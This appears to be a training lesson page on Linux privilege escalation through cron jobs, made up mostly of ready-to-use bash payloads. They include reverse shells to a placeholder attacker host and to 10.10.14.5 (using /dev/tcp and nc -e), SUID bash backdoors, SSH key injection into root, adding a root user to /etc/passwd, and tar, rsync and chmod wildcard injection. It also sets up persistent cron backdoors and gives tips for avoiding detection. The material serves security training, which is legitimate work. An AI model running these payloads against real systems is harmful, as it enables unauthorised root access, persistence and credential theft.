Cron Job Exploitation

intermediate35 minWriteup

Various techniques to exploit cron jobs

Learning Objectives

  • Exploit writable cron scripts
  • Abuse PATH in cron jobs
  • Exploit wildcards in cron
  • Use pspy to find hidden cron

You've

- now let's exploit them. From writable scripts to wildcard injection, cron jobs offer multiple privilege escalation vectors that execute on schedule without any user interaction.

The beauty of cron exploitation is its persistence. Once you've modified a cron script, your payload executes repeatedly. Set up a reverse shell, and it reconnects every time the job runs - even if your initial access is lost.

Timing Your Attack

Plan your exploitation around the cron schedule. A daily job at 3 AM means waiting hours. Consider adjusting payloads to immediately execute or choosing more frequent jobs first.

Writable Script Exploitation

bash
1606070;"># Scenario: Cron runs /opt/scripts/backup.sh as root
2606070;"># You discover it's writable:
3ls -la /opt/scripts/backup.sh
4606070;"># -rwxrwxrwx 1 root root ... backup.sh
5 
6606070;"># Method 1: Add reverse shell
7echo 606070;">#a5d6ff;">'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/scripts/backup.sh
8 
9606070;"># Method 2: Copy bash SUID
10echo 606070;">#a5d6ff;">'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /opt/scripts/backup.sh
11606070;"># After cron runs: /tmp/rootbash -p
12 
13606070;"># Method 3: Add your SSH key to root
14echo 606070;">#a5d6ff;">'echo "YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys' >> /opt/scripts/backup.sh
15 
16606070;"># Method 4: Add user to /etc/passwd
17echo 606070;">#a5d6ff;">'echo "hacker:$(openssl passwd -1 password):0:0::/root:/bin/bash" >> /etc/passwd' >> /opt/scripts/backup.sh
18 
19606070;"># Method 5: Chmod shadow file (for later cracking)
20echo 606070;">#a5d6ff;">'chmod 644 /etc/shadow' >> /opt/scripts/backup.sh

Non-Destructive Payloads

Prefer payloads that don't break the original script functionality. Append to the end rather than replacing content to avoid detection.

Writable Directory Exploitation

bash
1606070;"># Scenario: Script directory is writable
2ls -la /opt/scripts/
3606070;"># drwxrwxrwx 2 root root ... scripts/
4 
5606070;"># Replace entire script
6cat > /opt/scripts/backup.sh << 606070;">#a5d6ff;">'EOF'
7606070;">#!/bin/bash
8cp /bin/bash /tmp/rootbash
9chmod +s /tmp/rootbash
10EOF
11chmod +x /opt/scripts/backup.sh
12 
13606070;"># Or: Delete and recreate
14rm /opt/scripts/backup.sh
15echo 606070;">#a5d6ff;">'#!/bin/bash' > /opt/scripts/backup.sh
16echo 606070;">#a5d6ff;">'/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1' >> /opt/scripts/backup.sh
17chmod +x /opt/scripts/backup.sh
18 
19606070;"># Symlink attack (if script doesn't exist)
20606070;"># Cron references /opt/scripts/missing.sh
21ln -s /tmp/evil.sh /opt/scripts/missing.sh

PATH Manipulation in Cron

bash
1606070;"># Check PATH in /etc/crontab
2cat /etc/crontab
3606070;"># PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
4 
5606070;"># If cron script calls commands without full path:
6606070;"># backup.sh contents:
7606070;"># #!/bin/bash
8606070;"># service mysql stop          ← Not /usr/sbin/service!
9606070;"># tar -czf /backup/db.tar.gz /var/lib/mysql
10606070;"># service mysql start
11 
12606070;"># If /usr/local/sbin is writable:
13echo 606070;">#a5d6ff;">'#!/bin/bash' > /usr/local/sbin/service
14echo 606070;">#a5d6ff;">'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /usr/local/sbin/service
15chmod +x /usr/local/sbin/service
16 
17606070;"># When cron runs backup.sh, it finds our "service" first!
18 
19606070;"># Alternative: Create in writable PATH location
20606070;"># If PATH contains a writable directory like /home/user/bin

Cron PATH

Cron jobs often have a limited PATH. Check /etc/crontab for the PATH setting. The first writable directory in PATH is your target.

Wildcard Injection

When cron scripts use wildcards (*), you can create files that become malicious command arguments. This is especially powerful with tar, rsync, and chmod.

Tar Wildcard Injection

bash
1606070;"># Vulnerable cron script:
2606070;"># #!/bin/bash
3606070;"># cd /var/backups
4606070;"># tar -czf backup.tar.gz *
5 
6606070;"># When * expands, filenames become arguments:
7606070;"># tar -czf backup.tar.gz file1 file2 --checkpoint=1 --checkpoint-action=exec=shell.sh
8 
9606070;"># Create the exploit:
10cd /var/backups
11echo 606070;">#a5d6ff;">'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > shell.sh
12chmod +x shell.sh
13touch -- 606070;">#a5d6ff;">'--checkpoint=1'
14touch -- 606070;">#a5d6ff;">'--checkpoint-action=exec=shell.sh'
15 
16606070;"># Alternative with reverse shell:
17echo 606070;">#a5d6ff;">'/bin/bash -i >& /dev/tcp/ATTACKER/4444 0>&1' > shell.sh
18chmod +x shell.sh
19touch -- 606070;">#a5d6ff;">'--checkpoint=1'
20touch -- 606070;">#a5d6ff;">'--checkpoint-action=exec=shell.sh'
21 
22606070;"># When cron runs tar, it executes shell.sh as root!

Rsync Wildcard Injection

bash
1606070;"># Vulnerable cron script:
2606070;"># rsync -a * user@backup:/backup/
3 
4cd /target/directory
5echo 606070;">#a5d6ff;">'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > shell.sh
6chmod +x shell.sh
7touch -- 606070;">#a5d6ff;">'-e sh shell.sh'
8 
9606070;"># rsync interprets -e as the remote shell command

Chmod Wildcard Injection

bash
1606070;"># Vulnerable cron script:
2606070;"># chmod 700 /opt/data/*
3 
4cd /opt/data
5touch -- 606070;">#a5d6ff;">'--reference=/etc/passwd'
6606070;"># chmod applies /etc/passwd permissions to files
7 
8606070;"># Or use recursive
9touch -- 606070;">#a5d6ff;">'-R'
10touch -- 606070;">#a5d6ff;">'--reference=/tmp/evil'

Filename as Argument

The key insight: when wildcards expand, filenames become command-line arguments. A file named "--checkpoint=1" becomes the argument --checkpoint=1 to tar.

Environment Variable Abuse

bash
1606070;"># Some cron setups inherit or set environment variables
2 
3606070;"># Check for env vars in crontab
4cat /etc/crontab
5606070;"># SHELL=/bin/bash
6606070;"># PATH=/usr/local/sbin:/usr/local/bin
7606070;"># MAILTO=root
8606070;"># HOME=/root
9 
10606070;"># If HOME is writable (rare but check):
11606070;"># Create malicious .bashrc that runs on bash cron jobs
12 
13606070;"># If MAILTO is set:
14606070;"># Cron mails output - potential info leakage
15606070;"># Can't exploit directly but reveals info
16 
17606070;"># For user crontabs:
18606070;"># If cron runs bash scripts, .bashrc might execute

Creating Persistence

bash
1606070;"># Once you have root, add your own cron job:
2 
3606070;"># Method 1: System crontab
4echo 606070;">#a5d6ff;">'* * * * * root bash -i >& /dev/tcp/ATTACKER/4444 0>&1' >> /etc/crontab
5 
6606070;"># Method 2: Cron.d file
7echo 606070;">#a5d6ff;">'* * * * * root /tmp/shell.sh' > /etc/cron.d/persistence
8 
9606070;"># Method 3: User crontab
10crontab -e
11606070;"># Add: * * * * * /tmp/shell.sh
12 
13606070;"># Method 4: Hourly/daily directories
14cp /tmp/shell.sh /etc/cron.hourly/
15chmod +x /etc/cron.hourly/shell.sh
16 
17606070;"># Shell script for persistence:
18606070;">#!/bin/bash
19if ! pgrep -x 606070;">#a5d6ff;">"reverse_shell" > /dev/null; then
20    bash -i >& /dev/tcp/ATTACKER/4444 0>&1
21fi

Complete Payload Examples

bash
1606070;"># 1. SUID bash backdoor (silent, persistent)
2cat > /tmp/payload.sh << 606070;">#a5d6ff;">'EOF'
3606070;">#!/bin/bash
4cp /bin/bash /tmp/rootbash
5chmod u+s /tmp/rootbash
6EOF
7 
8606070;"># After: /tmp/rootbash -p
9 
10606070;"># 2. Reverse shell (active connection)
11cat > /tmp/payload.sh << 606070;">#a5d6ff;">'EOF'
12606070;">#!/bin/bash
13bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
14EOF
15 
16606070;"># 3. SSH key injection (stealth)
17cat > /tmp/payload.sh << 606070;">#a5d6ff;">'EOF'
18606070;">#!/bin/bash
19mkdir -p /root/.ssh
20echo 606070;">#a5d6ff;">"ssh-rsa AAAA...your_key... attacker@kali" >> /root/.ssh/authorized_keys
21chmod 700 /root/.ssh
22chmod 600 /root/.ssh/authorized_keys
23EOF
24 
25606070;"># 4. New root user (obvious but effective)
26cat > /tmp/payload.sh << 606070;">#a5d6ff;">'EOF'
27606070;">#!/bin/bash
28echo 606070;">#a5d6ff;">'pwned:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
29EOF
30 
31606070;"># 5. Netcat listener (if nc available)
32cat > /tmp/payload.sh << 606070;">#a5d6ff;">'EOF'
33606070;">#!/bin/bash
34nc -e /bin/bash 10.10.14.5 4444
35EOF

Cron Exploitation Methodology

Cron Attack Flow

1
IdentifyFind cron jobs running as root
2
AnalyzeCheck script content and permissions
3
VectorChoose: writable script, PATH, wildcard
4
PayloadPrepare appropriate exploit payload
5
DeployInject payload and wait for execution
6
VerifyConfirm root access when cron runs

Knowledge Check

Quick Quiz
Question 1 of 3

How does tar wildcard injection work?

Challenges

Wildcard Exploit

Challenge
🔥 intermediate

A cron job runs 'tar -czf /backup/data.tar.gz *' in /var/data/ as root every 5 minutes. Exploit it to gain root.

Need a hint? (4 available)

Key Takeaways

  • Writable cron scripts = immediate root code execution
  • PATH manipulation works when scripts use relative commands
  • Wildcard injection: filenames become command arguments
  • tar --checkpoint-action is the classic wildcard exploit
  • Append payloads to maintain stealth and functionality
  • SUID bash backdoor provides persistent access